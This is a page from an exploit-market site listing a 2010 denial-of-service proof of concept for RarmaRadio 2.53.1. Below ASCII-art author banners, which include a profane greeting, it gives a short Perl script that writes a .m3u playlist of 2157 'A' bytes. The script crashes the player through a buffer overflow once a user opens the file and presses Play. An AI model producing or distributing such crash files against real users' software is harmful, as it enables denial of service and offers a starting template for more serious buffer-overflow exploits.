[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

RarmaRadio Version 2.53.1 Bass 2.4 (.m3u) Buffer Overflow

Author
anT!-Tr0J4n
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13297
Category
dos / poc
Date add
24-11-2010
Platform
windows
=========================================================
RarmaRadio Version 2.53.1 Bass 2.4 (.m3u) Buffer Overflow
=========================================================

                         ||          ||   | ||      
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
                  ( :   /    (_)    /           (   .

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
3                                                                      3
3             _     __       __    ________     __  __                 3
7           /' \  /'__`\   /'__`\ /\_____  \   /\ \/\ \                7
1          /\_, \/\_\L\ \ /\_\L\ \\/___//'/'   \_\ \ \ \____           1
3          \/_/\ \/_/_\_<_\/_/_\_<_   /' /'    /'_` \ \ '__`\          3
3             \ \ \/\ \L\ \ /\ \L\ \ /' /'    /\ \L\ \ \ \L\ \         3
7              \ \_\ \____/ \ \____//\_/      \ \___,_\ \_,__/         7
1               \/_/\/___/   \/___/ \//        \/__,_ /\/___/          1
3              >> Exploit database separated by exploit                3
3                     type (local, remote, DoS, etc.)                  3
7                                                                      7
1          [+] Site            : 1337db.com                            1
3          [+] Support e-mail  : submit[at]1337db.com                  3
3                                                                      3
7             ##############################################           7
1             I'm anT!-Tr0J4n 1337 Member from 1337 DataBase           1
3             ##############################################           3
3                                                                      3                                            
7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7

.....................X-SHADOW ; ThBa7 ; KloofQ8 ; LeGEnD ; abada ...
.......................................Fuck ALL lamers top-team...................
.............................../??/)..............(\?`\...... .......
............................../....//..............\....\...........
............................./....//................\....\..........
......................../??/..../??\............/?` ....\?`\.........
....................././.../..../..../.|_....._|.\....\....\...\.\...
...................(.(....(....(..../.)..).....(..(.\....)....)....).)
....................\................\/.../....\...\/................/
....................\................. /........\................../.
......................\..............(............)............../...
........................\.............\.........../............./....


#!/usr/bin/perl
#Title: RarmaRadio Version 2.53.1 Bass 2.4 (.m3u) Buffer Overflow Vulnerability

#Author    :   anT!-Tr0J4n

#Inj3ct0r Site: http:1337db.com

#Email      :   D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com

#Greetz    :   Dev-PoinT.com ; GlaDiatOr,SILVER STAR , HoBeeZ, Coffin Of Evil

#special thanks    :   r0073r,Sid3^effects,L0rd CruSad3r,SeeMe,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr,indoushka, KnocKout,SONiC,ZoRLu
 
#Home     :   www.Dev-PoinT.com  $ http://inj3ct0r.com

#Software :  http://www.raimersoft.com/rarmaradio.aspx

#Version   :  2.53 Bass 2.4

#Tested on:   Windows XP sp3

# DATE   : 22-11-2010
#
###################################################################

my $file= "inj3ct0r team.m3u";
 
my $junk= "\x41" x  2157;
 
open($FILE, ">$file");
print($FILE $junk);
close($FILE);
print("File created succesufully , open  it with RarmaRadio and press the Play button");



#  0day.today [2024-09-28]  #